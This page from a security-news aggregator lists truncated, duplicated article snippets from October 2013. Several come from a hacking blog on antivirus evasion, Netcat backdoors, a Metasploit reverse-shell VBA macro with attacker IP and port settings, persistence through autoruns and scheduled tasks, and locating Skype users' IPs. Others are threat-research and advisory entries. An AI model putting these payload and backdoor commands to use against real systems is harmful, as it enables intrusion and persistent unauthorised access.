All Articles

Ordered by Date Published : Year: "2013" Month: "10"
and by Page: 1 (of 0)

Total Articles in this collection: 31

Navigation Help at the bottom of the page
Article: List of Differnet AV evasion Frameworks. - published over 10 years ago.
Content: Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload. (1)Veil:- Veil is python based tool which create ...
https://tipstrickshack.blogspot.com/2013/10/list-of-differnet-av-evasion-frameworks.html   
Published: 2013 10 30 10:20:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: List of Differnet AV evasion Frameworks. - published over 10 years ago.
Content: Today we are gonna talk about different AV evasion frameworks for metasploit payload & how to use them? It`s very imporatant when you know which AV you have to bypass, because we don`t have to worry about FUD. Some payload can bypass specific AV ; while other AV can not be bypassed using that payload. (1)Veil:- Veil is python based tool which create ...
https://tipstrickshack.blogspot.com/2013/10/list-of-differnet-av-evasion-frameworks.html   
Published: 2013 10 30 10:20:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Free Score Certificate
Cyber Tzar Free Score Certificate
Article: Backdoor using Netcat, cryptcat , ncat. - published over 10 years ago.
Content: Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command. netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL Attacker `s I.P : 192.168.56.1 Victim`s I.P.     : 192.168.56.101 We wi...
https://tipstrickshack.blogspot.com/2013/10/backdoor-using-netcat-cryptcat-ncat.html   
Published: 2013 10 24 12:00:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Backdoor using Netcat, cryptcat , ncat. - published over 10 years ago.
Content: Today we are gonna talk about Netcat & its alternative ; i assume that all of you are familiar with Netcat. If not than read here.  Also i assume that you have already open port 455 using following command. netsh firewall add portopening TCP 455 "Service Firewall" ENABLE ALL Attacker `s I.P : 192.168.56.1 Victim`s I.P.     : 192.168.56.101 We wi...
https://tipstrickshack.blogspot.com/2013/10/backdoor-using-netcat-cryptcat-ncat.html   
Published: 2013 10 24 12:00:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Get shell Using Shellcode in Macro. - published over 10 years ago.
Content: We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload. msfconsole use payload/windows/meterpreter/reverse_tcp set LHOST 192.168.56.102 set LPORT 443 generate -t vba exploit Now we have generated our shellcode. Now we will create macro. (1)Ope...
https://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html   
Published: 2013 10 18 09:42:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Get shell Using Shellcode in Macro. - published over 10 years ago.
Content: We can execute shellcode directly in macro. It`s very old method, but still it`s useful ; because AV don`t trigger it.First we will generate VB code of our payload. msfconsole use payload/windows/meterpreter/reverse_tcp set LHOST 192.168.56.102 set LPORT 443 generate -t vba exploit Now we have generated our shellcode. Now we will create macro. (1)Ope...
https://tipstrickshack.blogspot.com/2013/10/get-shell-using-shellcode-in-macro.html   
Published: 2013 10 18 09:42:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Article: Oracle Critical Patch Update Advisory - October 2013 - published over 10 years ago.
Content:
http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html   
Published: 2013 10 15 19:30:54
Received: 2021 06 06 09:03:27
Feed: Oracle Security Alerts
Source: Oracle Security Alerts
Category: Alerts
Topic: Vulnerabilities
Article: Oracle Critical Patch Update Advisory - October 2013 - published over 10 years ago.
Content:
http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html   
Published: 2013 10 15 19:30:54
Received: 2021 06 06 09:03:27
Feed: Oracle Security Alerts
Source: Oracle Security Alerts
Category: Alerts
Topic: Vulnerabilities
Article: How to detect Avast Antivirus remotely? - published over 10 years ago.
Content: During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not? Original video is posted...
https://tipstrickshack.blogspot.com/2013/10/how-to-detect-avast-antivirus-remotely.html   
Published: 2013 10 14 14:19:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: How to detect Avast Antivirus remotely? - published over 10 years ago.
Content: During assessment if you know which Anti virus is used by client then you won half battle.Because you can download trial version of that AV & install it in virtual box & try to bypass that AV. So during real assessment your payload or binary don`t get caught.Today we gonna try to detect if client has installed avast or not? Original video is posted...
https://tipstrickshack.blogspot.com/2013/10/how-to-detect-avast-antivirus-remotely.html   
Published: 2013 10 14 14:19:00
Received: 2024 02 20 16:43:00
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Free Score Certificate
Cyber Tzar Free Score Certificate
Cyber Tzar Gold Score Certificate
Cyber Tzar Gold Score Certificate
Article: Fun with skype resolver - published over 10 years ago.
Content: Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them. If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P. netstat -tupan | grep skype > n1 Now chat with your victim; as soon as you got reply use following com...
https://tipstrickshack.blogspot.com/2013/10/fun-with-skype-resolver.html   
Published: 2013 10 11 13:36:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Fun with skype resolver - published over 10 years ago.
Content: Skype resolvers are used by hackers to get Skype users IP addresses, when a hacker get a users IP address they usually hit them off or DDoS them. If your victim is in your friend-list & you are using linux ; then it`s very simple to get his I.P. netstat -tupan | grep skype > n1 Now chat with your victim; as soon as you got reply use following com...
https://tipstrickshack.blogspot.com/2013/10/fun-with-skype-resolver.html   
Published: 2013 10 11 13:36:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Score Summary
Cyber Tzar Score Summary
Cyber Tzar Score Analysis
Cyber Tzar Score Analysis
Article: Episode #171: Flexibly Finding Firewall Phrases - published over 10 years ago.
Content: Old Tim answers an old email Patrick Hoerter writes in: I have a large firewall configuration file that I am working with. It comes from that vendor that likes to prepend each product they sell with the same "well defended" name. Each configuration item inside it is multiple lines starting with "edit" and ending with "next". I'm trying to extract only th...
http://blog.commandlinekungfu.com/2013/10/episode-171-flexibly-finding-firewall.html   
Published: 2013 10 08 09:00:00
Received: 2023 03 31 08:44:32
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Article: Episode #171: Flexibly Finding Firewall Phrases - published over 10 years ago.
Content: Old Tim answers an old email Patrick Hoerter writes in: I have a large firewall configuration file that I am working with. It comes from that vendor that likes to prepend each product they sell with the same "well defended" name. Each configuration item inside it is multiple lines starting with "edit" and ending with "next". I'm trying to extract only th...
http://blog.commandlinekungfu.com/2013/10/episode-171-flexibly-finding-firewall.html   
Published: 2013 10 08 09:00:00
Received: 2023 03 31 08:44:32
Feed: Command Line Kung Fu
Source: Command Line Kung Fu
Category: News
Topic: Security Tooling
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Article: New FTP RAT - published over 10 years ago.
Content: Today I was browsing forums and I discovered a feature request/sales promotion thread.The thread was promoting a new RAT ( remote administration/access tool) using FTP ( file transfer protocol). Most RAT's require port forwarding but because this RAT uses FTP-php there is no need to port forward. Website: hxxp://swipe(dot)pw/ Will edit this post with samples...
http://trojan7malware.blogspot.com/2013/10/new-ftp-rat.html   
Published: 2013 10 07 23:22:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: New FTP RAT - published over 10 years ago.
Content: Today I was browsing forums and I discovered a feature request/sales promotion thread.The thread was promoting a new RAT ( remote administration/access tool) using FTP ( file transfer protocol). Most RAT's require port forwarding but because this RAT uses FTP-php there is no need to port forward. Website: hxxp://swipe(dot)pw/ Will edit this post with samples...
http://trojan7malware.blogspot.com/2013/10/new-ftp-rat.html   
Published: 2013 10 07 23:22:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Get shell using Missing Autoruns. - published over 10 years ago.
Content: In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc. (A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will r...
https://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html   
Published: 2013 10 07 07:50:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Get shell using Missing Autoruns. - published over 10 years ago.
Content: In previous post we saw that how can we execute schedule task after compromised PC.Today we will see another method to maintaining access of compromised pc. (A)When we install program in windows environment , some of them are asking to run at startup times. So these program write its value to windows registry & whenever pc is restarted , program will r...
https://tipstrickshack.blogspot.com/2013/10/create-backdoor-using-missing-autoruns.html   
Published: 2013 10 07 07:50:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Gold Score Certificate
Cyber Tzar Gold Score Certificate
Cyber Tzar Risk Impact Assesment
Cyber Tzar Risk Impact Assesment
Article: Schedule Task in windows after Exploitation. - published over 10 years ago.
Content: Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here. After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You...
https://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html   
Published: 2013 10 04 17:50:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Schedule Task in windows after Exploitation. - published over 10 years ago.
Content: Recently in Derbycon mubix & carnal0wnage present "windows attacks at is the new black ". It`s really great presentation . You can find it here. So i will put  their method here. After getting meterpreter shell ; we have to maintain access of shell. You can use meterpreter backdoor & persistent backdoor . But most of times it will caught by AV. You...
https://tipstrickshack.blogspot.com/2013/10/schedule-task-in-windows-after.html   
Published: 2013 10 04 17:50:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Score Analysis
Cyber Tzar Score Analysis
Cyber Tzar Your Score Explained
Cyber Tzar Your Score Explained
Article: Another Darkleech Campaign - published over 10 years ago.
Content: Last week got us up close and personal with Darkleech and Blackhole with our external careers web site. The fun didn’t end there, this week we saw a tidal wave of Darkleech activity linked to a large-scale malvertising campaign identified by the following URL: hXXp://delivery[.]globalcdnnode[.]com/7f01baa99716452bda5bba0572c58be9/afr-zone.php Again ...
http://www.fireeye.com/blog/threat-research/2013/10/another-darkleech-campaign.html   
Published: 2013 10 03 17:23:00
Received: 2021 06 06 09:05:11
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: Another Darkleech Campaign - published over 10 years ago.
Content: Last week got us up close and personal with Darkleech and Blackhole with our external careers web site. The fun didn’t end there, this week we saw a tidal wave of Darkleech activity linked to a large-scale malvertising campaign identified by the following URL: hXXp://delivery[.]globalcdnnode[.]com/7f01baa99716452bda5bba0572c58be9/afr-zone.php Again ...
http://www.fireeye.com/blog/threat-research/2013/10/another-darkleech-campaign.html   
Published: 2013 10 03 17:23:00
Received: 2021 06 06 09:05:11
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Risk Impact Distribution
Cyber Tzar Risk Impact Distribution
Article: OpenIOC: Back to the Basics - published over 10 years ago.
Content: Written by Will Gibb & Devon Kerr One challenge investigators face during incident response is finding a way to organize information about an attackers' activity, utilities, malware and other indicators of compromise, called IOCs. The OpenIOC format addresses this challenge head-on. OpenIOC provides a standard format and terms...
http://www.fireeye.com/blog/threat-research/2013/10/openioc-basics.html   
Published: 2013 10 01 18:45:52
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Article: OpenIOC: Back to the Basics - published over 10 years ago.
Content: Written by Will Gibb & Devon Kerr One challenge investigators face during incident response is finding a way to organize information about an attackers' activity, utilities, malware and other indicators of compromise, called IOCs. The OpenIOC format addresses this challenge head-on. OpenIOC provides a standard format and terms...
http://www.fireeye.com/blog/threat-research/2013/10/openioc-basics.html   
Published: 2013 10 01 18:45:52
Received: 2021 06 06 09:05:12
Feed: FireEye Blog
Source: FireEye Blog
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Risk Impact Assesment
Cyber Tzar Risk Impact Assesment
Cyber Tzar Risk Groups Explained
Cyber Tzar Risk Groups Explained
Article: Exploit For All IE version(CVE-2013-3893). - published over 10 years ago.
Content: Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded h...
https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html   
Published: 2013 10 01 16:37:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Article: Exploit For All IE version(CVE-2013-3893). - published over 10 years ago.
Content: Recently the public has shown a lot of interest in the new Internet Explorer vulnerability (CVE-2013-3893) that has been exploited in the wild, which was initially discovered in Japan. At the time of this writing there is still no patch available, but there is still at least a temporary fix-it that you can apply from Microsoft, which can be downloaded h...
https://tipstrickshack.blogspot.com/2013/10/exploit-for-all-ie-versioncve-2013-3893.html   
Published: 2013 10 01 16:37:00
Received: 2024 02 20 16:43:01
Feed: Hacking and Tricks
Source: Hacking and Tricks
Category: Cyber Security
Topic: Cyber Security
Cyber Tzar Change Over Time (Extended)
Cyber Tzar Change Over Time (Extended)
Article: Spammers already exploiting government shutdown? - published over 10 years ago.
Content: Today, I was scrolling through the endless amounts of 419 and port forward scams when one email caught my attention Subject: are you affected by the shutdown? We can help. <random # number to bypass spam filters> Hello. We're a employment agency who are hiring! After the government shut down we received a huge spike in job applications. We have noticed...
http://trojan7malware.blogspot.com/2013/10/spammers-already-exploiting-government.html   
Published: 2013 10 01 13:50:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security
Article: Spammers already exploiting government shutdown? - published over 10 years ago.
Content: Today, I was scrolling through the endless amounts of 419 and port forward scams when one email caught my attention Subject: are you affected by the shutdown? We can help. <random # number to bypass spam filters> Hello. We're a employment agency who are hiring! After the government shut down we received a huge spike in job applications. We have noticed...
http://trojan7malware.blogspot.com/2013/10/spammers-already-exploiting-government.html   
Published: 2013 10 01 13:50:00
Received: 2021 06 06 09:05:03
Feed: Trojan7Malware
Source: Trojan7Malware
Category: Cyber Security
Topic: Cyber Security

All Articles

Ordered by Date Published : Year: "2013" Month: "10"
Page: 1 (of 0)

Total Articles in this collection: 31


  • "All Articles" links back to the front page, effectivly the Planet "Home Page"; shows all articles, with no selections, or groupings.
  • Default date ordering is by "Received Date" (due to not all RSS feeds having a "Published Date").
  • Only Published Date selections use the articles Published Date.
  • The first page always shows fifty items plus from zero to up to a remaining forty-nine items, before they are commited permently to the next page.
  • All subsequent pages show fifty items.
  • Pagination is in reverse ordering (so that pages are permamenent links, aka "permalinks", to their content).
  • "<<" moves you to the first page (aka newest articles)
  • ">>" moves you to the last page (aka oldest articles)
  • "<" moves you to the previous page (aka newer articles)
  • ">" moves you to the next page (aka older articles)
  • Return to the top of this page Go Now

Custom HTML Block

Click to Open Code Editor